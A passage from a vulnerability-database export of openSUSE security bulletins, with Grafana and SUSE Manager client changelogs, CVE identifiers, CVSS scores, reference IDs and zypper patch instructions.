@kylebrandt\n - SingleStat: The gauge option in now disabled/hidden (unless it's an\n old panel with it already enabled) . #18610, @ryantxu\n - Stackdriver: Add extra alignment period options. #18909, @sunker\n - Units: Add South African Rand (ZAR) to currencies. #18893, @jeteon\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n * Bug Fixes\n - Alerting: Notification is sent when state changes from no_data to\n ok. #18920, @papagian\n - Alerting: fix duplicate alert states when the alert fails to save to\n the database. #18216, @kylebrandt\n - Alerting: fix response popover prompt when add notification\n channels. #18967, @lzdw\n - CloudWatch: Fix alerting for queries with Id (using GetMetricData).\n #17899, @alex-berger\n - Explore: Fix auto completion on label values for Loki. #18988,\n @aocenas\n - Explore: Fixes crash using back button with a zoomed in graph.\n #19122, @hugohaggmark\n - Explore: Fixes so queries in Explore are only run if Graph/Table is\n shown. #19000, @hugohaggmark\n - MSSQL: Change connectionstring to URL format to fix using passwords\n with semicolon. #18384, @Russiancold\n - MSSQL: Fix memory leak when debug enabled. #19049, @briangann\n - Provisioning: Allow escaping literal '$' with '$$' in configs to\n avoid interpolation. #18045, @kylebrandt\n - TimePicker: Fixes hiding time picker dropdown in FireFox. #19154,\n @hugohaggmark\n * Breaking changes\n + Annotations There are some breaking changes in the annotations HTTP\n API for region annotations. Region annotations are now represented\n using a single event instead of two seperate events. Check breaking\n changes in HTTP API below and HTTP API documentation for more\n details.\n + Docker Grafana is now using Alpine 3.10 as docker base image.\n + HTTP API\n - GET /api/alert-notifications now requires at least editor access.\n New /api/alert-notifications/lookup returns less information than\n /api/alert-notifications and can be access by any authenticated user.\n - GET /api/alert-notifiers now requires at least editor access\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than /api/org/users and can\n be access by users that are org admins, admin in any folder or admin of\n any team.\n - GET /api/annotations no longer returns regionId property.\n - POST /api/annotations no longer supports isRegion property.\n - PUT /api/annotations/:id no longer supports isRegion property.\n - PATCH /api/annotations/:id no longer supports isRegion property.\n - DELETE /api/annotations/region/:id has been removed.\n * Deprecation notes\n + PhantomJS\n - PhantomJS, which is used for rendering images of dashboards and\n panels, is deprecated and will be removed in a future Grafana release. A\n deprecation warning will from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from PhantomJS to the\n Grafana Image Renderer plugin.\n - Changes from 6.3.6\n * Features / Enhancements\n - Metrics: Adds setting for turning off total stats metrics. #19142,\n @marefr\n * Bug Fixes\n - Database: Rewrite system statistics query to perform better. #19178,\n @papagian\n - Explore: Fixes error when switching from prometheus to loki data\n sources. #18599, @kaydelaney\n - Rebase package spec. Use mostly from fedora, fix suse specified things\n and fix some errors.\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories are shown in\n logfiles.\n - Version 6.3.5\n * Upgrades\n + Build: Upgrade to go 1.12.9.\n * Bug Fixes\n + Dashboard: Fixes dashboards init failed loading error for dashboards\n with panel links that had missing properties.\n + Editor: Fixes issue where only entire lines were being copied.\n + Explore: Fixes query field layout in splitted view for Safari\n browsers.\n + LDAP: multildap + ldap integration.\n + Profile/UserAdmin: Fix for user agent parser crashes grafana-server\n on 32-bit builds.\n + Prometheus: Prevents panel editor crash when switching to Prometheus\n datasource.\n + Prometheus: Changes brace-insertion behavior to be less annoying.\n - Version 6.3.4\n * Security: CVE-2019-15043 - Parts of the HTTP API allow unauthenticated\n use.\n - Version 6.3.3\n * Bug Fixes\n + Annotations: Fix failing annotation query when time series query is\n cancelled. #18532 1, @dprokop 1\n + Auth: Do not set SameSite cookie attribute if cookie_samesite is\n none. #18462 1, @papagian 3\n + DataLinks: Apply scoped variables to data links correctly. #18454 1,\n @dprokop 1\n + DataLinks: Respect timezone when displaying datapoint\u2019s timestamp\n in graph context menu. #18461 2, @dprokop 1\n + DataLinks: Use datapoint timestamp correctly when interpolating\n variables. #18459 1, @dprokop 1\n + Explore: Fix loading error for empty queries. #18488 1, @davkal\n + Graph: Fixes legend issue clicking on series line icon and issue\n with horizontal scrollbar being visible on windows. #18563 1,\n @torkelo 2\n + Graphite: Avoid glob of single-value array variables . #18420,\n @gotjosh\n + Prometheus: Fix queries with label_replace remove the $1 match when\n loading query editor. #18480 5, @hugohaggmark 3\n + Prometheus: More consistently allows for multi-line queries in\n editor. #18362 2, @kaydelaney 2\n + TimeSeries: Assume values are all numbers. #18540 4, @ryantxu\n - Version 6.3.2\n * Bug Fixes\n + Gauge/BarGauge: Fixes issue with losts thresholds and issue loading\n Gauge with avg stat. #18375 12\n - Version 6.3.1\n * Bug Fixes\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels with panel\n links (drill down links). #18430 2\n - Version 6.3.0\n * Features / Enhancements\n + OAuth: Do not set SameSite OAuth cookie if cookie_samesite is None.\n #18392 4, @papagian 3\n + Auth Proxy: Include additional headers as part of the cache key.\n #18298 6, @gotjosh\n + Build grafana images consistently. #18224 12, @hassanfarid\n + Docs: SAML. #18069 11, @gotjosh\n + Permissions: Show plugins in nav for non admin users but hide plugin\n configuration. #18234 1, @aocenas\n + TimePicker: Increase max height of quick range dropdown. #18247 2,\n @torkelo 2\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n + Alerting: Attempt to send email notifications to all given email\n addresses. #16881 1, @zhulongcheng\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n + Alerting: Support for configuring content field for Discord alert\n notifier. #17017 2, @jan25\n + Alertmanager: Replace illegal chars with underscore in label names.\n #17002 5, @bergquist 1\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n + Auth: Return device, os and browser when listing user auth tokens in\n HTTP API. #17504, @shavonn 1\n + Auth: Support list and revoke of user auth tokens in UI. #17434 2,\n @shavonn 1\n + AzureMonitor: change clashing built-in Grafana variables/macro names\n for Azure Logs. #17140, @shavonn 1\n + CloudWatch: Made region visible for AWS Cloudwatch Expressions.\n #17243 2, @utkarshcmu\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n + Dashboard: Use timezone dashboard setting when exporting to CSV.\n #18002 1, @dehrax\n + Data links. #17267 11, @torkelo 2\n + Docker: Switch base image to ubuntu:latest from debian:stretch to\n avoid security issues\u2026 #17066 5, @bergquist 1\n + Elasticsearch: Support for visualizing logs in Explore . #17605 7,\n @marefr\n + Explore: Adds Live option for supported datasources. #17062 1,\n @hugohaggmark 3\n + Explore: Adds orgId to URL for sharing purposes. #17895 1,\n @kaydelaney 2\n + Explore: Adds support for new loki \u2018start\u2019 and \u2018end\u2019 params\n for labels endpoint. #17512, @kaydelaney 2\n + Explore: Adds support for toggling raw query mode in explore.\n #17870, @kaydelaney 2\n + Explore: Allow switching between metrics and logs . #16959 2, @marefr\n + Explore: Combines the timestamp and local time columns into one.\n #17775, @hugohaggmark 3\n + Explore: Display log lines context . #17097, @dprokop 1\n + Explore: Don\u2019t parse log levels if provided by field or label.\n #17180 1, @marefr\n + Explore: Improves performance of Logs element by limiting\n re-rendering. #17685, @kaydelaney 2\n + Explore: Support for new LogQL filtering syntax. #16674 4, @davkal\n + Explore: Use new TimePicker from Grafana/UI. #17793, @hugohaggmark 3\n + Explore: handle newlines in LogRow Highlighter. #17425, @rrfeng 1\n + Graph: Added new fill gradient option. #17528 3, @torkelo 2\n + GraphPanel: Don\u2019t sort series when legend table & sort column is\n not visible . #17095, @shavonn 1\n + InfluxDB: Support for visualizing logs in Explore. #17450 9,\n @hugohaggmark 3\n + Logging: Login and Logout actions (#17760). #17883 1, @ATTron\n + Logging: Move log package to pkg/infra. #17023, @zhulongcheng\n + Metrics: Expose stats about roles as metrics. #17469 2, @bergquist 1\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and year intervals\n in macros. #13086 6, @bernardd\n + MySQL: Add support for periodically reloading client certs. #14892,\n @tpetr\n + Plugins: replace dataFormats list with skipDataQuery flag in\n plugin.json. #16984, @ryantxu\n + Prometheus: Take timezone into account for step alignment. #17477,\n @fxmiii\n + Prometheus: Use overridden panel range for $__range instead of\n dashboard range. #17352, @patrick246\n + Prometheus: added time range filter to series labels query. #16851\n 3, @FUSAKLA\n + Provisioning: Support folder that doesn\u2019t exist yet in dashboard\n provisioning. #17407 1, @Nexucis\n + Refresh picker: Handle empty intervals. #17585 1, @dehrax\n + Singlestat: Add y min/max config to singlestat sparklines. #17527 4,\n @pitr\n + Snapshot: use given key and deleteKey. #16876, @zhulongcheng\n + Templating: Correctly display __text in multi-value variable after\n page reload. #17840 1, @EduardSergeev\n + Templating: Support selecting all filtered values of a multi-value\n variable. #16873 2, @r66ad\n + Tracing: allow propagation with Zipkin headers. #17009 4, @jrockway\n + Users: Disable users removed from LDAP. #16820 2, @alexanderzobnin\n * Bug Fixes\n + PanelLinks: Fix render issue when there is no panel description.\n #18408 3, @dehrax\n + OAuth: Fix \u201cmissing saved state\u201d OAuth login failure due to\n SameSite cookie policy. #18332 1, @papagian 3\n + cli: fix for recognizing when in dev mode\u2026 #18334, @xlson\n + DataLinks: Fixes incorrect interpolation of ${__series_name} .\n #18251 1, @torkelo 2\n + Loki: Display live tailed logs in correct order in Explore. #18031\n 3, @kaydelaney 2\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2, @xlson\n + TimePicker: Fixed style issue for custom range popover. #18244,\n @torkelo 2\n + Timerange: Fixes a bug where custom time ranges didn\u2019t respect\n UTC. #18248 1, @kaydelaney 2\n + remote_cache: Fix redis connstr parsing. #18204 1, @mblaschke\n + AddPanel: Fix issue when removing moved add panel widget . #17659 2,\n @dehrax\n + CLI: Fix encrypt-datasource-passwords fails with sql error. #18014,\n @marefr\n + Elasticsearch: Fix default max concurrent shard requests. #17770 4,\n @marefr\n + Explore: Fix browsing back to dashboard panel. #17061, @jschill\n + Explore: Fix filter by series level in logs graph. #17798, @marefr\n + Explore: Fix issues when loading and both graph/table are collapsed.\n #17113, @marefr\n + Explore: Fix selection/copy of log lines. #17121, @marefr\n + Fix: Wrap value of multi variable in array when coming from URL.\n #16992 1, @aocenas\n + Frontend: Fix for Json tree component not working. #17608, @srid12\n + Graphite: Fix for issue with alias function being moved last.\n #17791, @torkelo 2\n + Graphite: Fixes issue with seriesByTag & function with variable\n param. #17795, @torkelo 2\n + Graphite: use POST for /metrics/find requests. #17814 2, @papagian 3\n + HTTP Server: Serve Grafana with a custom URL path prefix. #17048 6,\n @jan25\n + InfluxDB: Fixes single quotes are not escaped in label value\n filters. #17398 1, @Panzki\n + Prometheus: Correctly escape \u2018|\u2019 literals in interpolated PromQL\n variables. #16932, @Limess\n + Prometheus: Fix when adding label for metrics which contains colons\n in Explore. #16760, @tolwi\n + SinglestatPanel: Remove background color when value turns null.\n #17552 1, @druggieri\n - Make phantomjs dependency configurable\n - Create plugin directory and clean up (create in %install, add to %files)\n handling of /var/lib/grafana/* and\n\n koan:\n\n - Calculate relative path for kernel and inited when generating grub entry\n (bsc#1170231)\n - Fix os-release version detection for SUSE\n\n mgr-cfg:\n\n - Remove commented code in test files\n - Replace spacewalk-usix with uyuni-common-libs\n - Bump version to 4.1.0 (bsc#1154940)\n - Add mgr manpage links\n\n mgr-custom-info:\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n mgr-daemon:\n\n - Bump version to 4.1.0 (bsc#1154940)\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\n mgr-osad:\n\n - Separate osa-dispatcher and jabberd so it can be disabled independently\n - Replace spacewalk-usix with uyuni-common-libs\n - Bump version to 4.1.0 (bsc#1154940)\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n - Require uyuni-base-common for /etc/rhn (for osa-dispatcher)\n - Ensure bytes type when using hashlib to avoid traceback (bsc#1138822)\n\n mgr-push:\n\n - Replace spacewalk-usix and spacewalk-backend-libs with uyuni-common-libs\n - Bump version to 4.1.0 (bsc#1154940)\n\n mgr-virtualization:\n\n - Replace spacewalk-usix with uyuni-common-libs\n - Bump version to 4.1.0 (bsc#1154940)\n - Fix mgr-virtualization timer\n\n rhnlib:\n\n - Fix building\n - Fix malformed XML response when data contains non-ASCII chars\n (bsc#1154968)\n - Bump version to 4.1.0 (bsc#1154940)\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled (bsc#1148177)\n\n spacecmd:\n\n - Only report real error, not result (bsc#1171687)\n - Use defined return values for spacecmd methods so scripts can check for\n failure (bsc#1171687)\n - Disable globbing for api subcommand to allow wildcards in filter\n settings (bsc#1163871)\n - Bugfix: attempt to purge SSM when it is empty (bsc#1155372)\n - Bump version to 4.1.0 (bsc#1154940)\n - Prevent error when piping stdout in Python 2 (bsc#1153090)\n - Java api expects content as encoded string instead of encoded bytes like\n before (bsc#1153277)\n - Enable building and installing for Ubuntu 16.04 and Ubuntu 18.04\n - Add unit test for schedule, errata, user, utils, misc, configchannel and\n kickstart modules\n - Multiple minor bugfixes alongside the unit tests\n - Bugfix: referenced variable before assignment.\n - Add unit test for report, package, org, repo and group\n\n spacewalk-client-tools:\n\n - Add workaround for uptime overflow to spacewalk-update-status as well\n (bsc#1165921)\n - Spell correctly \"successful\" and \"successfully\"\n - Skip dmidecode data on aarch64 to prevent coredump (bsc#1113160)\n - Replace spacewalk-usix with uyuni-common-libs\n - Return a non-zero exit status on errors in rhn_check\n - Bump version to 4.1.0 (bsc#1154940)\n - Make a explicit requirement to systemd for spacewalk-client-tools when\n rhnsd timer is installed\n\n spacewalk-koan:\n\n - Bump version to 4.1.0 (bsc#1154940)\n - Require commands we use in merge-rd.sh\n\n spacewalk-oscap:\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n spacewalk-remote-utils:\n\n - Update spacewalk-create-channel with RHEL 7.7 channel definitions\n - Bump version to 4.1.0 (bsc#1154940)\n\n supportutils-plugin-susemanager-client:\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n suseRegisterInfo:\n\n - SuseRegisterInfo only needs perl-base, not full perl (bsc#1168310)\n - Bump version to 4.1.0 (bsc#1154940)\n\n zypp-plugin-spacewalk:\n\n - 1.0.7\n - Prevent issue with non-ASCII characters in Python 2 systems (bsc#1172462)\n\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2020-1105=1", "published": "2020-07-27T23:12:36", "modified": "2020-07-27T23:12:36", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/IOKZ2ZLWZFEMWWMRLEXUHNNGBN3FNKGH/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2019-10215", "CVE-2019-15043", "CVE-2020-12245", "CVE-2020-13379"], "immutableFields": [], "lastseen": "2021-10-24T10:27:35", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["REDHAT-RHSA-2020-5599.NASL", "REDHAT-RHSA-2020-2861.NASL", "FEDORA_2019-0BB6B876DA.NASL", "REDHAT-RHSA-2020-2796.NASL", "REDHAT-RHSA-2020-2641.NASL", "ORACLELINUX_ELSA-2020-2641.NASL", "OPENSUSE-2020-1105.NASL", "FEDORA_2020-A09E5BE0BE.NASL", "CENTOS8_RHSA-2020-4682.NASL", "REDHAT-RHSA-2020-4682.NASL", "SUSE_SU-2020-1970-1.NASL", "REDHAT-RHSA-2020-1659.NASL", "CENTOS8_RHSA-2020-2641.NASL", "OPENSUSE-2020-892.NASL", "FEDORA_2019-77D612EAB4.NASL", "REDHAT-RHSA-2020-2676.NASL", "NEWSTART_CGSL_NS-SA-2021-0066_GRAFANA.NASL", "CENTOS8_RHSA-2020-1659.NASL", "ORACLELINUX_ELSA-2020-4682.NASL", "REDHAT-RHSA-2021-1518.NASL", "FEDORA_2020-E6E81A03D6.NASL"]}, {"type": "cve", "idList": ["CVE-2019-15043", "CVE-2020-12245", "CVE-2020-13379", "CVE-2019-10215"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-13379", "RH:CVE-2019-10215", "RH:CVE-2019-15043", "RH:CVE-2020-12245"]}, {"type": "attackerkb", "idList": ["AKB:A4C40AA9-050B-4FF2-A029-BE3ADC6857CA", "AKB:72725B13-8444-4A5A-B4E8-71CF57FF5C25"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-13379", "UB:CVE-2020-12245", "UB:CVE-2019-15043"]}, {"type": "f5", "idList": ["F5:K00843201"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876775", "OPENVAS:1361412562310142855", "OPENVAS:1361412562310144077", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310143778", "OPENVAS:1361412562310876781", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310877964"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0892-1", "OPENSUSE-SU-2020:1646-1", "OPENSUSE-SU-2020:1611-1"]}, {"type": "symantec", "idList": ["SMNTC-110352"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2020-12245/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-13379/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-12245/", "MSF:ILITIES/REDHAT_LINUX-CVE-2020-12245/"]}, {"type": "fedora", "idList": ["FEDORA:B5BAF6085907", "FEDORA:77DCE3126D28", "FEDORA:6B2F331352FF", "FEDORA:E84B06062C8C"]}, {"type": "redhat", "idList": ["RHSA-2020:2792", "RHSA-2020:2676", "RHSA-2020:1659", "RHSA-2020:2861", "RHSA-2020:2641", "RHSA-2020:4298", "RHSA-2020:5599", "RHSA-2021:0083", "RHSA-2019:3771", "RHSA-2021:1518", "RHSA-2020:4682", "RHSA-2020:2796"]}, {"type": "archlinux", "idList": ["ASA-201908-21"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5726", "ELSA-2020-4682", "ELSA-2020-1659", "ELSA-2020-2641"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158320"]}, {"type": "avleonov", "idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"]}, {"type": "exploitdb", "idList": ["EDB-ID:48638"]}, {"type": "zdt", "idList": ["1337DAY-ID-34640"]}, {"type": "almalinux", "idList": ["ALSA-2020:4682"]}], "modified": "2021-10-24T10:27:35", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-10-24T10:27:35", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "noarch", "operator": "lt", "packageVersion": "0.1.1590413773.a959db7-lp152.2.3.1", "packageFilename": "dracut-saltboot-0.1.1590413773.a959db7-lp152.2.3.1.noarch.rpm", "packageName": "dracut-saltboot"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.suse.SuseBulletin"]}, {"id": "OPENSUSE-SU-2020:0892-1", "hash": "0a2a914e8b03230e5daaaa7a6313e36a", "type": "suse", "bulletinFamily": "unix", "title": "Security update for grafana, grafana-piechart-panel, grafana-status-panel (moderate)", "description": "An update that fixes three vulnerabilities is now available.\n\nDescription:\n\n This update for grafana, grafana-piechart-panel, grafana-status-panel\n fixes the following issues:\n\n grafana was updated to version 7.0.3:\n\n * Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n - Variables: change VariableEditorList row action Icon to IconButton.\n #25217, @hshoff\n\n * Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317, @papagian\n - Configuration: Fix env var override of sections containing hyphen.\n #25178, @marefr\n - Dashboard: Get panels in collapsed rows. #25079, @peterholmberg\n - Do not show alerts tab when alerting is disabled. #25285, @dprokop\n - Jaeger: fixes cascader option label duration value. #25129, @Estrax\n - Transformations: Fixed Transform tab crash & no update after adding\n first transform. #25152, @torkelo\n\n Update to version 7.0.2\n\n * Bug fixes\n\n - Security: Urgent security patch release to fix CVE-2020-13379\n\n Update to version 7.0.1\n\n * Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query history more\n readable. #24795, @kaydelaney\n - Download CSV: Add date and time formatting. #24992, @ryantxu\n - Table: Make last cell value visible when right aligned. #24921,\n @peterholmberg\n - TablePanel: Adding sort order persistance. #24705, @torkelo\n - Transformations: Display correct field name when using reduce\n transformation. #25068, @peterholmberg\n - Transformations: Allow custom number input for binary operations.\n #24752, @ryantxu\n\n * Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not working. #24773,\n @KamalGalrani\n - Dashboard/Links: Fixes open in new window for dashboard link. #24772,\n @KamalGalrani\n - Dashboard/Links: Variables are resolved and limits to 100. #25076,\n @hugohaggmark\n - DataLinks: Bring back variables interpolation in title. #24970,\n @dprokop\n - Datasource/CloudWatch: Field suggestions no longer limited to\n prefix-only. #24855, @kaydelaney\n - Explore/Table: Keep existing field types if possible. #24944,\n @kaydelaney\n - Explore: Fix wrap lines toggle for results of queries with filter\n expression. #24915, @ivanahuckova\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n - Explore: fix word break in type head info. #25014, @zoltanbedi\n - Graph: Legend decimals now work as expected. #24931, @torkelo\n - LoginPage: Fix hover color for service buttons. #25009, @tskarhed\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n - MoveDashboard: Fix for moving dashboard caused all variables to be\n lost. #25005, @torkelo\n - Organize transformer: Use display name in field order comparer.\n #24984, @dprokop\n - Panel: shows correct panel menu items in view mode. #24912,\n @hugohaggmark\n - PanelEditor Fix missing labels and description if there is only single\n option in category. #24905, @dprokop\n - PanelEditor: Overrides name matcher still show all original field\n names even after Field default display name is specified. #24933,\n @torkelo\n - PanelInspector: Makes sure Data display options are visible. #24902,\n @hugohaggmark\n - PanelInspector: Hides unsupported data display options for Panel type.\n #24918, @hugohaggmark\n - PanelMenu: Make menu disappear on button press. #25015, @tskarhed\n - Postgres: Fix add button. #25087, @phemmer\n - Prometheus: Fix recording rules expansion. #24977, @ivanahuckova\n - Stackdriver: Fix creating Service Level Objectives (SLO) datasource\n query variable. #25023, @papagian\n\n Update to version 7.0.0\n\n * Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana v6.4 and\n starting from Grafana v7.0.0, all PhantomJS support has been removed.\n This means that Grafana no longer ships with a built-in image\n renderer, and we advise you to install the Grafana Image Renderer\n plugin.\n - Dashboard: A global minimum dashboard refresh interval is now enforced\n and defaults to 5 seconds.\n - Interval calculation: There is now a new option Max data points that\n controls the auto interval $__interval calculation. Interval was\n previously calculated by dividing the panel width by the time range.\n With the new max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For example if you set\n Max data points to 10 Grafana will dynamically set $__interval by\n dividing the current time range by 10.\n - Datasource/Loki: Support for deprecated Loki endpoints has been\n removed.\n - Backend plugins: Grafana now requires backend plugins to be signed,\n otherwise Grafana will not load/start them. This is an additional\n security measure to make sure backend plugin binaries and files\n haven't been tampered with. Refer to Upgrade Grafana for more\n information.\n - @grafana/ui: Forms migration notice, see @grafana/ui changelog\n - @grafana/ui: Select API change for creating custom values, see\n @grafana/ui changelog\n + Deprecation warnings\n - Scripted dashboards is now deprecated. The feature is not removed\n but will be in a future release. We hope to address the underlying\n requirement of dynamic dashboards in a different way. #24059\n - The unofficial first version of backend plugins together with usage\n of grafana/grafana-plugin-model is now deprecated and support for\n that will be removed in a future release. Please refer to backend\n plugins documentation for information about the new officially\n supported backend plugins.\n\n * Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the unofficial\n first version of backend plugins. #24675, @marefr\n - Editor: New line on Enter, run query on Shift+Enter. #24654, @davkal\n - Loki: Allow multiple derived fields with the same name. #24437,\n @aocenas\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n * Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to get directory.\n #24677, @zoltanbedi\n - Admin: Makes long settings values line break in settings page. #24559,\n @hugohaggmark\n - Dashboard: Allow editing provisioned dashboard JSON and add\n confirmation when JSON is copied to dashboard. #24680, @dprokop\n - Dashboard: Fix for strange \"dashboard not found\" errors when opening\n links in dashboard settings. #24416, @torkelo\n - Dashboard: Fix so default data source is selected when data source\n can't be found in panel editor. #24526, @mckn\n - Dashboard: Fixed issue changing a panel from transparent back to\n normal in panel editor. #24483, @torkelo\n - Dashboard: Make header names reflect the field name when exporting to\n CSV file from the the panel inspector. #24624, @peterholmberg\n - Dashboard: Make sure side pane is displayed with tabs by default in\n panel editor. #24636, @dprokop\n - Data source: Fix query/annotation help content formatting. #24687,\n @AgnesToulet\n - Data source: Fixes async mount errors. #24579, @Estrax\n - Data source: Fixes saving a data source without failure when URL\n doesn't specify a protocol. #24497, @aknuds1\n - Explore/Prometheus: Show results of instant queries only in table.\n #24508, @ivanahuckova\n - Explore: Fix rendering of react query editors. #24593, @ivanahuckova\n - Explore: Fixes loading more logs in logs context view. #24135, @Estrax\n - Graphite: Fix schema and dedupe strategy in rollup indicators for\n Metrictank queries. #24685, @torkelo\n - Graphite: Makes query annotations work again. #24556, @hugohaggmark\n - Logs: Clicking \"Load more\" from context overlay doesn't expand log\n row. #24299, @kaydelaney\n - Logs: Fix total bytes process calculation. #24691, @davkal\n - Org/user/team preferences: Fixes so UI Theme can be set back to\n Default. #24628, @AgnesToulet\n - Plugins: Fix manifest validation. #24573, @aknuds1\n - Provisioning: Use proxy as default access mode in provisioning.\n #24669, @bergquist\n - Search: Fix select item when pressing enter and Grafana is served\n using a sub path. #24634, @tskarhed\n - Search: Save folder expanded state. #24496, @Clarity-89\n - Security: Tag value sanitization fix in OpenTSDB data source. #24539,\n @rotemreiss\n - Table: Do not include angular options in options when switching from\n angular panel. #24684, @torkelo\n - Table: Fixed persisting column resize for time series fields. #24505,\n @torkelo\n - Table: Fixes Cannot read property subRows of null. #24578,\n @hugohaggmark\n - Time picker: Fixed so you can enter a relative range in the time\n picker without being converted to absolute range. #24534, @mckn\n - Transformations: Make transform dropdowns not cropped. #24615, @dprokop\n - Transformations: Sort order should be preserved as entered by user\n when using the reduce transformation. #24494, @hugohaggmark\n - Units: Adds scale symbol for currencies with suffixed symbol. #24678,\n @hugohaggmark\n - Variables: Fixes filtering options with more than 1000 entries.\n #24614, @hugohaggmark\n - Variables: Fixes so Textbox variables read value from url. #24623,\n @hugohaggmark\n - Zipkin: Fix error when span contains remoteEndpoint. #24524, @aocenas\n - SAML: Switch from email to login for user login attribute mapping\n (Enterprise)\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2020-892=1", "published": "2020-06-28T11:13:00", "modified": "2020-06-28T11:13:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RGQQWMLGYRF6YIXUAOYORJ7OFP6TD53F/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2019-15043", "CVE-2020-12245", "CVE-2020-13379"], "immutableFields": [], "lastseen": "2021-10-24T12:28:07", "history": [], "viewCount": 29, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:A4C40AA9-050B-4FF2-A029-BE3ADC6857CA", "AKB:72725B13-8444-4A5A-B4E8-71CF57FF5C25"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-13379", "UB:CVE-2020-12245", "UB:CVE-2019-15043"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-13379", "RH:CVE-2019-15043", "RH:CVE-2020-12245"]}, {"type": "cve", "idList": 